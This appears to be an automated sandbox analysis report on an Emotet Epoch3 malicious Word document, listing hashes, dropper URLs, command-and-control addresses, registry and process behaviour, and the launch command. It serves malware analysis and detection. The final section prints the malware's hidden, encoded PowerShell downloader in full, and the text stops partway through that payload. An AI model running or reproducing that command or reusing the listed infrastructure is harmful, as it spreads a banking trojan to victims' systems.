emotet | d7c3e71d5a6e9b66ffa6d4571a53f986b3c507b32557c0db8d855cd8c7fd1607

General

Target

メリークリスマス.doc
Size

162KB
MD5

71d9aa9f45329b844843dc8ee84abe80
SHA1

064404ffb86f30dd0b1155ba9f61cfaf3cbb2e65
SHA256

d7c3e71d5a6e9b66ffa6d4571a53f986b3c507b32557c0db8d855cd8c7fd1607
SHA512

80410771ae1f979c6a39372ae1f3e045fdffef4e125cd1edf5a800cb13513e636c7daf03489eb796f2e483b7cb97d190239318187c954fd0b8ff7c71d1de6291

Score

10^/10

emotet epoch3 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://aktuel.marduk.kim/dooxi-fuel-hf09b/Logs/

exe.dropper

http://braam.com.br/c/oaA7YWWX/

exe.dropper

http://zebaorganics.com/wp-admin/en-US/

exe.dropper

http://friendsofchrist10.com/streamlabs-obs-rarso/SIGNUP/

exe.dropper

http://guojiazui.com/b/y0QnnWbk/

exe.dropper

http://fi.bonitastores.com/n/WUGoZ/

exe.dropper

http://iog.com.cn/css/Sys/

Extracted

Family

emotet

Botnet

Epoch3

C2

172.193.14.201:80

77.89.249.254:443

203.157.152.9:7080

157.245.145.87:443

195.159.28.244:8080

115.79.195.246:80

163.53.204.180:443

88.119.191.111:80

46.105.131.68:8080

110.37.224.243:80

117.2.139.117:443

172.104.46.84:8080

185.142.236.163:443

37.46.129.215:8080

195.201.56.70:8080

2.82.75.215:80

178.33.167.120:8080

8.4.9.137:8080

203.153.216.178:7080

139.59.12.63:8080

rsa_pubkey.plain

Signatures

Emotet
Emotet is a trojan that is primarily spread through spam emails.
trojan banker emotet
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1504 1952 cmd.exe
Blocklisted process makes network request 7 IoCs

Processes:

powershell.exerundll32.exe

flow pid process

6 1780 powershell.exe
8 1776 rundll32.exe
9 1776 rundll32.exe
10 1776 rundll32.exe
13 1776 rundll32.exe
14 1776 rundll32.exe
15 1776 rundll32.exe
Loads dropped DLL 4 IoCs

Processes:

rundll32.exe

pid process

1316 rundll32.exe
1316 rundll32.exe
1316 rundll32.exe
1316 rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1504	1952	cmd.exe

flow	pid	process
6	1780	powershell.exe
8	1776	rundll32.exe
9	1776	rundll32.exe
10	1776	rundll32.exe
13	1776	rundll32.exe
14	1776	rundll32.exe
15	1776	rundll32.exe

pid	process
1316	rundll32.exe
1316	rundll32.exe
1316	rundll32.exe
1316	rundll32.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exerundll32.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\Zyhm\zomuht.ouh	rundll32.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE

Modifies registry class 280 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95BA13E4-8B3C-4525-96C7-4E58B748C20C}\2.0\0	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}\ = "Tab"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}\ = "MdcTextEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\TypeLib\{95BA13E4-8B3C-4525-96C7-4E58B748C20C}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}\ = "OptionFrameEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\TypeLib\{95BA13E4-8B3C-4525-96C7-4E58B748C20C}\2.0\FLAGS\ = "6"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{95BA13E4-8B3C-4525-96C7-4E58B748C20C}\2.0\ = "Microsoft Forms 2.0 Object Library"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

1064 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exerundll32.exe

pid process

1780 powershell.exe
1780 powershell.exe
1776 rundll32.exe
1776 rundll32.exe
1776 rundll32.exe
1776 rundll32.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1780 powershell.exe
Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

1064 WINWORD.EXE
1064 WINWORD.EXE

pid	process
1064	WINWORD.EXE

pid	process
1780	powershell.exe
1780	powershell.exe
1776	rundll32.exe
1776	rundll32.exe
1776	rundll32.exe
1776	rundll32.exe

description	pid	process
Token: SeDebugPrivilege	1780	powershell.exe

pid	process
1064	WINWORD.EXE
1064	WINWORD.EXE

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

cmd.exepowershell.exerundll32.exerundll32.exeWINWORD.EXE

description	pid	process	target process
PID 1504 wrote to memory of 1512	1504	cmd.exe	msg.exe
PID 1504 wrote to memory of 1512	1504	cmd.exe	msg.exe
PID 1504 wrote to memory of 1512	1504	cmd.exe	msg.exe
PID 1504 wrote to memory of 1780	1504	cmd.exe	powershell.exe
PID 1504 wrote to memory of 1780	1504	cmd.exe	powershell.exe
PID 1504 wrote to memory of 1780	1504	cmd.exe	powershell.exe
PID 1780 wrote to memory of 1928	1780	powershell.exe	rundll32.exe
PID 1780 wrote to memory of 1928	1780	powershell.exe	rundll32.exe
PID 1780 wrote to memory of 1928	1780	powershell.exe	rundll32.exe
PID 1928 wrote to memory of 1316	1928	rundll32.exe	rundll32.exe
PID 1928 wrote to memory of 1316	1928	rundll32.exe	rundll32.exe
PID 1928 wrote to memory of 1316	1928	rundll32.exe	rundll32.exe
PID 1928 wrote to memory of 1316	1928	rundll32.exe	rundll32.exe
PID 1928 wrote to memory of 1316	1928	rundll32.exe	rundll32.exe
PID 1928 wrote to memory of 1316	1928	rundll32.exe	rundll32.exe
PID 1928 wrote to memory of 1316	1928	rundll32.exe	rundll32.exe
PID 1316 wrote to memory of 1776	1316	rundll32.exe	rundll32.exe
PID 1316 wrote to memory of 1776	1316	rundll32.exe	rundll32.exe
PID 1316 wrote to memory of 1776	1316	rundll32.exe	rundll32.exe
PID 1316 wrote to memory of 1776	1316	rundll32.exe	rundll32.exe
PID 1316 wrote to memory of 1776	1316	rundll32.exe	rundll32.exe
PID 1316 wrote to memory of 1776	1316	rundll32.exe	rundll32.exe
PID 1316 wrote to memory of 1776	1316	rundll32.exe	rundll32.exe
PID 1064 wrote to memory of 1928	1064	WINWORD.EXE	splwow64.exe
PID 1064 wrote to memory of 1928	1064	WINWORD.EXE	splwow64.exe
PID 1064 wrote to memory of 1928	1064	WINWORD.EXE	splwow64.exe
PID 1064 wrote to memory of 1928	1064	WINWORD.EXE	splwow64.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\メリークリスマス.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1064

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1928

C:\Windows\system32\cmd.exe
cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IABzAGUAVAAtAGkAdABFAG0AIAAgACgAIgB2ACIAKwAiAEEAUgAiACsAIgBJAEEAIgArACIAYgBMAEUAOgBvAGwAVQAiACsAIgAzAGoAIgApACAAIAAoACAAIABbAHQAeQBQAEUAXQAoACIAewA0AH0AewAyAH0AewAzAH0AewAwAH0AewAxAH0AIgAtAGYAIAAnAE8AJwAsACcAUgB5ACcALAAnAEkATwAuAGQAJwAsACcAaQByAGUAYwB0ACcALAAnAFMAWQBTAHQAZQBtAC4AJwApACkAIAA7ACAAIAAgACQAZwBRAEEAVgBJAHoAPQAgAFsAdAB5AFAARQBdACgAIgB7ADUAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADEAfQB7ADIAfQAiACAALQBGACAAJwAuAG4ARQBUAC4AJwAsACcARQBwAE8AJwAsACcASQBOAFQAbQBBAE4AQQBHAGUAcgAnACwAJwBZAFMAVABFAG0AJwAsACcAUwBlAFIAdgBpAEMAJwAsACcAcwAnACkAIAAgADsAJABHAGUAcwBzAHoAeABrAD0AKAAnAFEAZQAnACsAKAAnAHIAdAB4ACcAKwAnAGUAdgAnACkAKQA7ACQATQBzAHcAaABkAHUAawA9ACQATgA5AHIAOQBtAGEAZAAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQASQA2AGkAdgBlADgAawA7ACQATABlADAAXwBiADQAeQA9ACgAJwBSACcAKwAoACcAdwBiACcAKwAnADcAcwBuACcAKQArACcAcwAnACkAOwAgACgAIABHAEUAdAAtAFYAQQByAGkAYQBCAGwAZQAgACgAIgBvAEwAVQAzACIAKwAiAGoAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAEMAYABSAGUAYABBAGAAVABlAGQAYABJAHIAZQBDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBtACcAKwAoACcAbwB3AEsAJwArACcAMAAnACkAKwAnADYAeQAnACsAKAAnAGEAMAA4ACcAKwAnAG0AbwB3ACcAKQArACgAJwBOADQAJwArACcAZwAnACkAKwAnAGQAegAnACsAKAAnAG4AJwArACcAYwBtAG8AdwAnACkAKQAtAGMAcgBlAFAATABBAEMAZQAgACAAKAAnAG0AbwAnACsAJwB3ACcAKQAsAFsAYwBoAGEAcgBdADkAMgApACkAOwAkAEYAcgB2ADIANwBmAGYAPQAoACcAQQBnACcAKwAoACcAZwAnACsAJwA1AG8AMQBlACcAKQApADsAIAAkAGcAUQBhAFYASQB6ADoAOgAiAFMAYABlAGMAdQBgAFIAaQBUAHkAYABwAHIAbwBgAFQATwBDAE8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzADEAJwArACcAMgAnACkAKQA7ACQAVgBtAGQAcwBmAHcAegA9ACgAJwBHADEAJwArACgAJwBqADEAJwArACcAMAAnACkAKwAnAGgANQAnACkAOwAkAEgAaABfADMAbwBsAGEAIAA9ACAAKAAnAEkAJwArACcANQBuACcAKwAoACcAeQBsACcAKwAnAHUAagBrAF8AJwApACkAOwAkAFoANwB3ADUAbgAwAHMAPQAoACcAQgBmACcAKwAnAGoAYQAnACsAKAAnAGsAdwAnACsAJwAzACcAKQApADsAJABNAGYANwBwAGoANQBtAD0AKAAnAE0AdgAnACsAKAAnAG0AJwArACcAcQBvACcAKQArACcAawBjACcAKQA7ACQASAA0AGsANwA3AGcAegA9ACQASABPAE0ARQArACgAKAAnADEAJwArACcARgAnACsAJwBMACcAKwAoACcASwAwADYAJwArACcAeQBhACcAKwAnADAAOAAxAEYATAAnACsAJwBOACcAKQArACcANAAnACsAKAAnAGcAZAAnACsAJwB6ACcAKQArACgAJwBuACcAKwAnAGMAMQBGAEwAJwApACkAIAAgAC0AYwBSAGUAcABsAEEAQwBlACgAWwBDAGgAYQBSAF0ANAA5ACsAWwBDAGgAYQBSAF0ANwAwACsAWwBDAGgAYQBSAF0ANwA2ACkALABbAEMAaABhAFIAXQA5ADIAKQArACQASABoAF8AMwBvAGwAYQArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAE4AbwB4ADQAZABwAG4APQAoACgAJwBGACcAKwAnAHgAZgB5ACcAKQArACcAegBtACcAKwAnAHUAJwApADsAJABKADYAcwByADgAMABpAD0ATgBgAGUAVwAtAG8AYgBgAEoAZQBgAGMAVAAgAE4ARQB0AC4AVwBlAEIAQwBMAEkARQBuAFQAOwAkAFIAOQBoADQAegB5AG8APQAoACgAKAAoACcAaAB0AHQAJwArACcAcAA6AEoAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAoACcAKwAnAEoAJwArACcAKQAoADMAcwAyACkAKABhACcAKQApACsAJwBrAHQAJwArACcAdQAnACsAJwBlACcAKwAoACcAbAAuAG0AJwArACcAYQAnACkAKwAnAHIAZAAnACsAKAAoACcAdQBrAC4AawBpAG0ASgAnACsAJwApACcAKwAnACgAMwBzADIAJwArACcAKQAoAGQAbwAnACsAJwBvACcAKQApACsAJwB4AGkAJwArACgAKAAnAC0AZgB1AGUAbAAnACsAJwAtAGgAZgAwACcAKwAnADkAJwArACcAYgBKACcAKwAnACkAJwArACcAKAAzAHMAMgApACcAKQApACsAKAAoACcAKABMAG8AZwBzAEoAJwArACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACcAKAAnACsAKAAoACcAQABoAHQAdAAnACsAJwBwADoASgApACcAKwAnACgAMwBzADIAKQAoAEoAJwArACcAKQAoADMAJwArACcAcwAyACkAJwArACcAKABiAHIAYQBhAG0ALgBjACcAKwAnAG8AJwApACkAKwAoACgAJwBtAC4AYgByAEoAJwArACcAKQAoADMAJwArACcAcwAyACcAKQApACsAJwApACcAKwAnACgAJwArACgAKAAnAGMASgAnACsAJwApACgAMwBzACcAKwAnADIAKQAnACkAKQArACcAKAAnACsAKAAnAG8AYQAnACsAJwBBADcAWQAnACkAKwAoACcAVwAnACsAJwBXAFgAJwApACsAJwBKACcAKwAoACgAJwApACgAJwArACcAMwAnACkAKQArACcAcwAyACcAKwAoACgAJwApACcAKwAnACgAQABoAHQAdABwACcAKwAnADoASgAnACkAKQArACgAKAAnACkAKAAnACkAKQArACgAKAAnADMAJwArACcAcwAyACkAKABKACkAKAAnACsAJwAzAHMAMgApACgAegAnACkAKQArACcAZQAnACsAKAAnAGIAJwArACcAYQBvAHIAZwBhAG4AJwArACcAaQAnACkAKwAoACcAYwAnACsAJwBzAC4AJwApACsAKAAnAGMAbwBtACcAKwAnAEoAJwApACsAKAAoACcAKQAoACcAKwAnADMAcwAnACkAKQArACgAKAAnADIAKQAoACcAKwAnAHcAJwApACkAKwAoACcAcAAtAGEAZAAnACsAJwBtACcAKQArACgAKAAnAGkAbgBKACkAJwArACcAKAAnACkAKQArACgAKAAnADMAcwAyACkAJwArACcAKABlACcAKwAnAG4ALQBVAFMAJwApACkAKwAoACgAJwBKACcAKwAnACkAKAAzACcAKwAnAHMAMgApACgAJwApACkAKwAoACcAQAAnACsAJwBoAHQAdAAnACkAKwAnAHAAJwArACgAKAAnADoASgApACgAMwAnACsAJwBzACcAKwAnADIAJwApACkAKwAoACgAJwApACgASgAnACsAJwApACcAKQApACsAKAAnACgAJwArACcAMwBzADIAKQAnACkAKwAnACgAJwArACcAZgAnACsAJwByAGkAJwArACgAKAAnAGUAJwArACcAbgAnACsAJwBkAHMAbwBmAGMAaAByAGkAcwB0ADEAMAAuAGMAbwAnACsAJwBtAEoAKQAoACcAKwAnADMAcwAyACkAJwApACkAKwAnACgAJwArACgAJwBzACcAKwAnAHQAcgAnACkAKwAoACcAZQBhAG0AbAAnACsAJwBhAGIAcwAtACcAKwAnAG8AJwArACcAYgAnACkAKwAnAHMAJwArACcALQByACcAKwAoACcAYQAnACsAJwByAHMAbwBKACcAKQArACcAKQAnACsAKAAoACcAKAAzACcAKQApACsAJwBzACcAKwAoACgAJwAyACkAJwArACcAKAAnACsAJwBTAEkARwBOAFUAUAAnACkAKQArACgAKAAnAEoAKQAoADMAJwArACcAcwAyACkAJwApACkAKwAoACgAJwAoACcAKwAnAEAAaAAnACkAKQArACcAdAAnACsAKAAoACcAdAAnACsAJwBwADoASgAnACsAJwApACgAMwBzADIAJwApAC